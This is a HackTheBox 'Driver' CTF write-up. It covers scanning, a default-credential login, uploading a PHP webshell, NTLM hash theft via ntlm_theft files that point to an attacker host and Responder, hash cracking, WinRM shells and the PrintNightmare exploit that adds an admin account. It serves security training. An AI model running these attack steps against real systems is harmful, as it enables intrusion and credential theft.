![[HackTheBox] Driver](https://cdn.hashnode.com/res/hashnode/image/upload/v1646342132741/XUmRJmu9D.png?w=1600&h=840&fit=crop&crop=entropy&auto=compress,format&format=webp)
Footprinting
Open ports
First, let's use Nmap to scan the open ports:
$ nmap -sS -p- -Pn -v10 -oA syn_full 10.10.11.106
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
$ nmap -sC -sV -p80,135,445,5985 -Pn -v10 -oA vuln 10.10.11.106
PORT STATE SERVICEREASON VERSION
80/tcpopen httpsyn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open httpsyn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
It's a Windows machine, running an IIS web server on port 80, and another service on port 5985 (which we'll cover later).
HTTP
The first request asks for a username and password. Surprisingly, my first admin:admin attempt worked:
>>>
GET / HTTP/1.1
Host: 10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=
<<<
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.25
Metasploit could have been used to brute-force the Basic authentication.
In the website, there are:
An upload page:
/fw_up.phpAn image:
/images/ricoh.pngA possible hostname@domain:
support@driver.htb
Rabbit Holes
The directory indexing is not enabled in /images:
>>>
GET /images/ HTTP/1.1
Host: 10.10.11.106
Authorization: Basic YWRtaW46YWRtaW4=
<<<
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/10.0
Regarding the Host header, 10.10.11.106 driver.htb can be added into /etc/hosts. Indeed, some wesites' behavior changes depending on the Host header:
The Host Header tells the webserver which virtual host to use (if set up). You can even have the same virtual host using several aliases (e.g.
driver.htb,config.driver.htb, ...). In this case, you still have the possibility to read that header manually in your web app if you want to provide different behavior based on different domains addressed. This is possible because in your webserver you can (must?) set up one vhost to be the default host. This default vhost is used whenever the host header does not match any of the configured virtual hosts.A Host header field must be sent in all HTTP/1.1 request messages. A 400 (Bad Request) status code will be sent to any HTTP/1.1 request message that lacks a
Hostheader field or contains more than one.
However, the website doesn't behave differently when driver.htb is requested. Looking for Virtual hosts doesn't help neither:
gobuster vhost -k -w /usr/share/seclists/Discovery/DNS/deepmagic.com-prefixes-top50000.txt -u http://driver.htb/ -t 50 -H 'Authorization: Basic YWRtaW46YWRtaW4=' -q -o gobuster_vhosts.txt
Moving on, I see /fw_up.php page has an upload feature. I could upload a PHP webshell:
>>>
POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
Content-Type: multipart/form-data; boundary=---------------------------979429347213303672556720285
Authorization: Basic YWRtaW46YWRtaW4=
-----------------------------979429347213303672556720285
Content-Disposition: form-data; name="printers"
HTB DesignJet
-----------------------------979429347213303672556720285
Content-Disposition: form-data; name="firmware"; filename="simple-backdoor.php"
Content-Type: application/x-php
<?php system($_REQUEST['cmd']);?>
-----------------------------979429347213303672556720285--
<<<
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Location: fw_up.php?msg=SUCCESS
<<<
Select printer model and upload the respective firmware update to our file share.
Our testing team will review the uploads manually and initiates the testing soon.
But I don't know where the webshell is uploaded :-\
dirbuster (without forgetting the Authentication header) showed no sensitive URLs:
$ dirb http://10.10.11.106/ /usr/share/dirb/wordlists/big.txt -H "Host: driver.htb" -H "Authorization: Basic YWRtaW46YWRtaW4=" -o dirb_80.txt
---- Scanning URL: http://10.10.11.106/ ----
==> DIRECTORY: http://10.10.11.106/images/
==> DIRECTORY: http://10.10.11.106/Images/
+ http://10.10.11.106/index.php (CODE:200|SIZE:4279)
No public vulnerabilities on the PHP version could be found as well :-/:
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.3.25
No backup files (e.g. index.php.bak, index.php~) could be found :-[:
$ dirb http://10.10.11.106/index.php /usr/share/dirb/wordlists/mutations_common.txt -t
$ dirb http://10.10.11.106/fw_up.php /usr/share/dirb/wordlists/mutations_common.txt -t
NTLM Hash Stealer & Responder
I finally went out of these rabbit holes! It is possible to steal the NTLM of a Windows machine if the victim open a malicious file:
Since MS08-068, you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the 'reflective' attack) unless you're performing a cross-protocol relay (which is an entirely different topic). However you can still relay the hash to another machine.
SMB Signing needs to be disabled on the machine you're relaying too. With the exception of Windows Server OS's, all Windows operating systems have SMB Signing disabled by default.
Let's check if SMB Signing is disabled:
$ crackmapexec smb 10.10.11.0/24 --gen-relay-list cme_smb_targets.txt
SMB 10.10.11.101 445 WRITER [*] Windows 6.1 Build 0 (name:WRITER) (domain:) (signing:False) (SMBv1:False)
SMB 10.10.11.102 445 EARTH [*] Windows 10.0 Build 17763 x64 (name:EARTH) (domain:windcorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
We're only interested in the
DRIVERmachine.
The signing is set to False, which means NTLM hashes could be stolen! To do so, we need to poison the SMB service using responder:
$ sudo responder -I tun0
Then, we can create bunch of files linking to an inexistant share we own using NTLM_Theft
ntlm_theft[...] generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network.The benefits of these file types over say macro based documents or exploit documents are that all of these are built using "intended functionality". None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.
$ python ntlm_theft.py --generate all --server 10.10.15.101 --filename responder
My kali (
10.10.15.101) is set as the server.
Uploading all of these files in the website, I realized the lnk extension worked!
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:67a7a5698e868c4b:CFB25FAF60CA4EBA9C220CEC8EEC4016:010100000000000080746EE6B0EFD70163437CDC35832326000000000200080057005A005600440001001E00570049004E002D005600580036004B00300044005200310031003100460004003400570049004E002D005600580036004B0030004400520031003100310046002E0057005A00560044002E004C004F00430041004C000300140057005A00560044002E004C004F00430041004C000500140057005A00560044002E004C004F00430041004C000700080080746EE6B0EFD70106000400020000000800300030000000000000000000000000200000577C4AF061A90A5EE9289C8A49D0C8D66D643F896E2ECC7FCEBDD0B5968444760A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E00310030003100000000000000000000000000
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
Then, the hash can be cracked:
$ hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt /usr/share/wordlists/rockyou.txt -o hashcat.output
$ cat hashcat.output
TONY::DRIVER:89a952d5d0ae0dc8:cb699871fdc24c0c7c573c39cb8f91e4:010100000000000080746ee6b0efd7019aa00c07c847f9b1000000000200080057005a005600440001001e00570049004e002d005600580036004b00300044005200310031003100460004003400570049004e002d005600580036004b0030004400520031003100310046002e0057005a00560044002e004c004f00430041004c000300140057005a00560044002e004c004f00430041004c000500140057005a00560044002e004c004f00430041004c000700080080746ee6b0efd70106000400020000000800300030000000000000000000000000200000577c4af061a90a5ee9289c8a49d0c8d66d643f896e2ecc7fcebdd0b5968444760a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e00310030003100000000000000000000000000:liltony
The credentials are tony:liltony !
Crackmapexec
Let's check we have access to the shares of the victim:
$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' --shares
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.10.11.106 445 DRIVER [+] DRIVER\tony:liltony
SMB 10.10.11.106 445 DRIVER [+] Enumerated shares
SMB 10.10.11.106 445 DRIVER Share Permissions Remark
SMB 10.10.11.106 445 DRIVER ----- ----------- ------
SMB 10.10.11.106 445 DRIVER ADMIN$ Remote Admin
SMB 10.10.11.106 445 DRIVER C$ Default share
SMB 10.10.11.106 445 DRIVER IPC$ Remote IPC
Yes we have ! Do we have RCE ?
$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' -x 'dir'
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.10.11.106 445 DRIVER [+] DRIVER\tony:liltony
$ crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' -X 'dir'
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.10.11.106 445 DRIVER [+] DRIVER\tony:liltony
Seems not :/
Note: The content of the shares
tonycan access are not interesting.
Evil Nightmare
user.txt
Remember that port 5985 was opened ?
PORT STATE SERVICE REASON
5985/tcp open wsman syn-ack ttl 127
This service is running WinRM
If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.
Quickly, I found evil-winrm can be used to exploit that service and get a shell:
$ evil-winrm -i 10.10.11.106 -u tony -p liltony -P 5985
PS> C:\Users\tony\Documents> whoami
driver\tony
The user flag is:
PS> C:\Users\tony\Desktop> ls
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/13/2021 11:31 AM 1250056 mimi.exe
-ar--- 12/13/2021 9:05 AM 34 user.txt
-a---- 12/13/2021 11:18 AM 1927680 win.exe
PS> C:\Users\tony\Desktop> cat user.txt
c11[...]6c5
Note: it is possible to use a Empire's
listenerandstagerto get a reverse shell, as no antivirus blocks it.
Similar to /var/www/html in Linux, Microsoft IIS stores the website contents in C:\inetpub\ by default.
C:\inetpub\wwwrootcontains all the web pages and content that will be published on the web. It is the default directory for publishing web pages.
PS C:\inetpub\wwwroot> Get-ChildItem -recurse .
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/7/2021 11:29 PM images
-a---- 9/8/2021 5:06 AM 6136 fw_up.php
-a---- 9/8/2021 4:51 AM 4906 index.php
Directory: C:\inetpub\wwwroot\images
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/7/2021 11:29 PM 201503 ricoh.png
Nothing really interesting in the source code, except that the firmwares are uploaded in C:\firmwares:
if($_SERVER['REQUEST_METHOD']=="POST"){
$target_dir = "C:\\firmwares\\";
root.txt
In the C:\temp\ directory, there is a folder z87179L19:
PS C:\temp\z87179L19> Get-ChildItem .
Directory: C:\temp\z87179L19
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/11/2021 7:20 AM disk1
d----- 6/11/2021 7:20 AM misc
Googling that directory quickly shows that the machine could be vulnerable to local privilege escalation:
A vulnerability affects several Windows printer drivers for a wide range of printers from Ricoh manufacture. The improperly protected library files are loaded by
PrintIsolationHost.exe, a process running asSYSTEM.Note: I couldn't use Metasploit to exploit that service
After some time, I realized that Print Nightmare was the way to go. Indeed:
The website contains an image of the RICOH printer, and is named
Driver;This CTF was released in 2021 ;
Print Nightmarewas discovered in 2021 (CVE-2021-34527).
More information here:
The Print Spooler (
spoolsv.exe) is a Windows service that handles print jobs. The description of the service is: "This service spools print jobs and handles interaction with the printer. If you turn off this service, you won't be able to print or see your printers." The service runs by default on both Windows servers and clients.
PS> Get-Service Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
A PowerShell version of the exploit has been developed by Caleb Stewart & John Hammond. This script exploit the fact that Print Spooler local privilege escalation to create a local adminstrator account:
PS> Import-Module ./CVE-2021-1675.ps1
PS> Invoke-Nightmare -NewUser "jamarir" -NewPassword "jamarir" -DriverName "PrintMe"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user jamarir as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
PS> net users jamarir
User name jamarir
[...]
Local Group Memberships *Administrators
Finally, we can use Evil-WinRM again to connect to that administrator account, and grab the root flag:
$ evil-winrm -i 10.10.11.106 -u jamarir -p jamarir -P 5985
PS> C:\Users\jamarir\Documents> whoami
driver\jamarir
PS> Get-Content C:\Users\Administrator\Desktop\root.txt
7cd[...]c3b
Don't forget to clean behind you :)
PS> rm C:\temp\htb_jamarir